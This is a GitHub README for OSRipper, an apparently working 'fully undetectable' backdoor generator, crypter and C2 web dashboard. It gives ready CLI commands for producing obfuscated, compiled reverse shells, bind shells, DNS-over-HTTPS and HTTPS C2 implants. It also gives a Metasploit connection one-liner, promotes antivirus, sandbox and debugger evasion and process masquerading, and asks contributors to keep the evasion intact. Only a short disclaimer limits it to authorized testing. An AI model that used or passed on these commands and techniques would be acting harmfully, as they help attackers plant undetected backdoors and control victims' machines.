Skip to content

black-hak/OSRipper

 
 

Repository files navigation

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

Advanced cross-platform payload generator and crypter with FUD capabilities

FeaturesQuick StartWeb UIPayload TypesDocumentation


Overview

OSRipper is a sophisticated, fully undetectable (FUD) backdoor generator and crypter designed for authorized penetration testing and red team operations. It features advanced evasion techniques, multiple payload types, and a modern web-based C2 interface for managing compromised systems.

Key Highlights

  • Fully Undetectable (FUD) - Advanced evasion techniques bypass modern AV solutions
  • Web-Based C2 Interface - Modern dashboard for managing active sessions
  • Multiple Payload Types - Bind shells, reverse shells, DoH C2, HTTPS C2, and more
  • Multi-Layer Obfuscation - Standard and enhanced obfuscation with randomized variables
  • Binary Compilation - Compile payloads to standalone executables
  • Encrypted Communications - SSL/TLS and certificate-pinned HTTPS C2 channels
  • Stealth Features - VM detection, anti-debugging, process masquerading

Features

Payload Generation

Payload Type Description Use Case
Bind Shell Opens port on victim machine Direct access when reverse connections blocked
Reverse TCP Meterpreter SSL/TLS encrypted reverse connection Standard penetration testing
DNS-over-HTTPS C2 Stealthy DoH-based command & control Bypass network restrictions
HTTPS C2 Certificate-pinned HTTPS C2 Secure, authenticated C2 channel
Staged Payload Multi-stage web delivery Enhanced stealth deployment
Custom Code Crypter Obfuscate any Python script Custom payload encryption

Evasion Techniques

  • Advanced Obfuscation - Multi-layer code encoding with random variables
  • Enhanced Obfuscation - Anti-debug, VM detection, junk code injection
  • Anti-VM Detection - Sandbox and virtual machine evasion
  • Stealth Delays - Random startup delays (5-15 seconds)
  • Process Masquerading - Disguise as legitimate system processes
  • Signature Randomization - Every payload is unique

Web UI Features

  • Session Dashboard - View all active C2 sessions
  • Interactive Terminal - Execute commands via web interface
  • Payload Generator - Generate payloads directly from web UI
  • Session Management - View system info, command history, and manage sessions
  • Real-time Updates - Live command execution and response viewing

Advanced Capabilities

  • Ngrok Integration - Automatic tunnel creation for dynamic IPs
  • Certificate Pinning - Secure HTTPS C2 with certificate validation
  • Session Persistence - Maintain connections across restarts
  • Command Queueing - Queue commands for offline agents
  • Response Parsing - Automatic parsing of command output

Quick Start

Installation

# Clone repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Install dependencies
pip3 install -r requirements.txt

# Install package
pip3 install -e .

Important — run setup for optional features (ngrok, binary compilation):
On many systems (especially Linux with an externally-managed Python environment), you must run the built-in setup so optional dependencies are installed into OSRipper’s own venv. Do this once after installation:

osripper-cli setup

This creates ~/.local/share/osripper/venv, installs pyngrok, nuitka, and sandboxed there, and all later runs of osripper / osripper-cli will use them automatically. Without this, --ngrok and --compile will prompt you to run setup. Use osripper-cli setup --system only if you prefer a system/user pip install instead of the venv.

Basic Usage

Interactive Mode:

osripper
# or
python3 -m osripper

Command Line:

# Generate reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Generate DoH C2 payload
osripper-cli doh -d example.com --obfuscate --compile

Web UI:

# Start C2 server with web UI
python -m osripper.c2.server example.com --port 5000

# Access dashboard at http://localhost:5000

Web UI

OSRipper includes a modern web-based C2 interface for managing compromised systems.

Features

  • Dashboard - Overview of all active sessions
  • Session Management - View system information and execute commands
  • Payload Generator - Generate DoH and HTTPS payloads via web interface
  • Command History - Track all executed commands and responses
  • Real-time Updates - Live command execution and response viewing

Starting the C2 Server

# Basic usage
python -m osripper.c2.server example.com

# With HTTPS
python -m osripper.c2.server example.com --https

# Custom port
python -m osripper.c2.server example.com --port 8080

# With custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Accessing the Web UI

Once the server is running, access the dashboard at:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (if enabled)

Payload Types

1. Bind Shell Backdoor

Opens a port on the victim machine and waits for connections.

osripper-cli bind -p 4444 --obfuscate --compile

Connection:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Encrypted reverse connection with SSL/TLS.

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Stealthy C2 channel using DNS-over-HTTPS protocol. Bypasses many network restrictions.

# Generate payload
osripper-cli doh -d example.com --obfuscate --compile

# Start C2 server
python -m osripper.c2.server example.com

Features:

  • Stealthy DNS-based communication
  • Web UI for session management
  • Automatic session persistence
  • Command queueing for offline agents

4. HTTPS C2 (Certificate Pinning)

Secure HTTPS C2 with certificate pinning for authentication.

# Generate payload (via web UI or CLI)
# Start C2 server with HTTPS
python -m osripper.c2.server example.com --https

# Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint

Features:

  • Certificate pinning for security
  • Encrypted HTTPS communication
  • Web UI integration
  • Session management

5. Staged Payload

Multi-stage web delivery for enhanced stealth.

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Custom Code Crypter

Obfuscate and encrypt any Python script.

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Command Line Interface

Common Options

Option Description
--obfuscate Enable multi-layer obfuscation
--enhanced Enhanced obfuscation (anti-debug, VM detection)
--compile Compile to standalone binary
--icon PATH Custom icon for compiled binary
--delay Add random startup delay (5-15 seconds)
--output, -o NAME Output filename
--quiet, -q Quiet mode (minimal output)

Examples

# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 with all features
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Custom script encryption
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Using ngrok for dynamic IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Detection Results

Latest VirusTotal Scans

antiscan result

Antiscan Results


Architecture

┌─────────────────┐
│   Generated     │
│    Binary       │
└─────────────────┘
         │
         │ Execute
         ▼
┌──────────────────┐
│ Obfuscated       │
│ Dropper          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 SERVER     │
│   (Web UI)      │
│                 │
└─────────────────┘
         │
         │ Command/Response
         ▼
┌─────────────────┐
│   Agent         │
│   Execution     │
└─────────────────┘

Screenshots

Main Interface

Web UI Dashboard

Web UI Dashboard


Advanced Configuration

Ngrok Integration

# Generate payload with ngrok
osripper-cli reverse --ngrok -p 4444

# Follow prompts to set up tunnel
# Run: ngrok tcp 4444

Custom Icons

osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

Obfuscation Levels

Standard Obfuscation:

  • Multi-layer encoding
  • Variable randomization
  • Code structure obfuscation

Enhanced Obfuscation:

  • All standard features
  • Anti-debugging techniques
  • VM detection
  • Junk code injection
  • Advanced evasion
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Enhanced
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

HTTPS C2 Setup

# 1. Start C2 server with HTTPS
python -m osripper.c2.server example.com --https

# 2. Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint

# 3. Generate payload with fingerprint (via web UI)
# Or use the fingerprint in your payload generation

Documentation


Roadmap

Completed (v0.3.2)

  • FUD payload generation (0/68 detection)
  • Web-based C2 interface
  • DNS-over-HTTPS C2 payload
  • HTTPS C2 with certificate pinning
  • Multi-layer obfuscation engine
  • Session management system
  • Command queueing and execution
  • Anti-VM detection
  • Process masquerading

In Progress

  • Enhanced post-exploitation modules
  • Advanced persistence mechanisms
  • File upload/download via web UI
  • Multi-user support for C2 server

Future Plans

  • AI-powered evasion techniques
  • Blockchain-based C2 infrastructure
  • Mobile platform support
  • Advanced social engineering payloads

Contributing

We welcome contributions from the security research community!

How to Contribute

  1. Fork the repository
  2. Create a feature branch (git checkout -b feature/amazing-feature)
  3. Commit your changes (git commit -m 'Add amazing feature')
  4. Push to the branch (git push origin feature/amazing-feature)
  5. Open a Pull Request

Development Guidelines

  • Follow PEP 8 coding standards
  • Add docstrings to all functions
  • Test on multiple platforms
  • Ensure FUD capabilities remain intact

Acknowledgments

Special thanks to the security research community and these projects:


Legal Disclaimer

IMPORTANT: This tool is developed for educational purposes and authorized penetration testing only.

  • Authorized Use: Security research, penetration testing, red team exercises
  • Prohibited Use: Unauthorized access, malicious activities, illegal purposes

The developers are not responsible for misuse of this software. Users must comply with all applicable laws and regulations.


Support

About

AV evading cross platform Backdoor and Crypter Framework with a integrated lightweight webUI

Resources

License

Code of conduct

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 84.2%
  • HTML 8.7%
  • JavaScript 4.4%
  • CSS 2.7%